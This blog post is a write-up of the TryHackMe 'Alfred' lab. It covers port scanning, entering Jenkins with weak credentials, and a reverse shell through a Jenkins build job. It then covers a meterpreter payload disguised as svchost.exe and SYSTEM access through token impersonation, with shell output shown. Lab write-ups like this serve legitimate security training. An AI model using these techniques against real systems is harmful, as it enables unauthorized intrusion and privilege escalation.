---
title: THM - Alfred
date: 2022-07-25 18:25:00 +0200
categories: [Writeups]
tags: [tryhackme, tutorial]     # TAG names should always be lowercase
---

## Initial access
What do Batman and Jenkins have in common? Check the page source code for the answer. <!--something something butler...-->
Running nmap reveals that the following three TCP ports listed below are open. Visiting the website hosted on TCP port 80 displays a picture of the actor Christian Bale.
To this day, no one has seen Batman and Christian Bale together in the same room. 

```shell
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -Pn -p1-10000 -v <TARGET_IP>
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy
```

Continueing to the Jenkins server on port 8080/tcp we are greeted with a login wall.
A quick Google search shows that the default username for Jenkins is admin and the password is stored in `$JENKINS_HOME/secrets/initialAdminPassword`.
However, this is not an option since we do not have access to the filesystem yet. Before attempting a fully fledged and noisy brute force atack,
why not check if the door is already half open? Seems like it is! 

After log in we can see a project with the name "project" (confusing) was last built succesfullly almost 3 years ago.
Checking the console output we see a shell executing a command:

```console?lang=batchfile
Started by user admin
Running as SYSTEM
Building in workspace C:\Program Files (x86)\Jenkins\workspace\project
[project] $ cmd /c call C:\Users\bruce\AppData\Local\Temp\jenkins8034204804437582227.bat

C:\Program Files (x86)\Jenkins\workspace\project>whoami
alfred\bruce

C:\Program Files (x86)\Jenkins\workspace\project>exit 0 
Finished: SUCCESS
```
We can replace the whoami command with the powershell command provided by THM and adjust it to match your attack machine webserver and netcat listener.
After running a new job for the project we obtained a shell!

```console
└─$ nc -lvnp 4242  
listening on [any] 4242 ...
connect to [10.11.75.80] from (UNKNOWN) [10.10.32.229] 49312
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Program Files (x86)\Jenkins\workspace\test>
```
The first flag is located at `C:\Users\bruce\Desktop\user.txt`

## Switching shells
The current shell works, but a meterpreter shell has much more capabilities. THM already provides the commands to create a meterpreter payload, but we are allowed to choose a name for the executable.
Its a good practice to use a common executable name to seem less suspicious. After downloading the payload using the reverse shell we already have we can run the executable: `C:\Program Files (x86)\Jenkins\workspace\test> ./svchost.exe`

Because running svchost.exe from the Jenkins folder is obviously not suspicious.. 

## Privilege escalation
Running `whoami /priv` shows we have the "SecurityImpersonation" Impersonation token level enabled.
By using meterpreter we are able to assign the NT Authority\System user impersonation token:

```console
meterpreter > getuid
Server username: alfred\bruce
meterpreter > impersonate_token "BUILTIN\Administrators" 
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Meterpreter warns us that we are not running as the system user. Windows checks the primary token of a process, not the impersonation token to determine privileges.
We therefore need to migrate to a process running under the system user such as services.exe.

After migrating we are able to grab the root flag!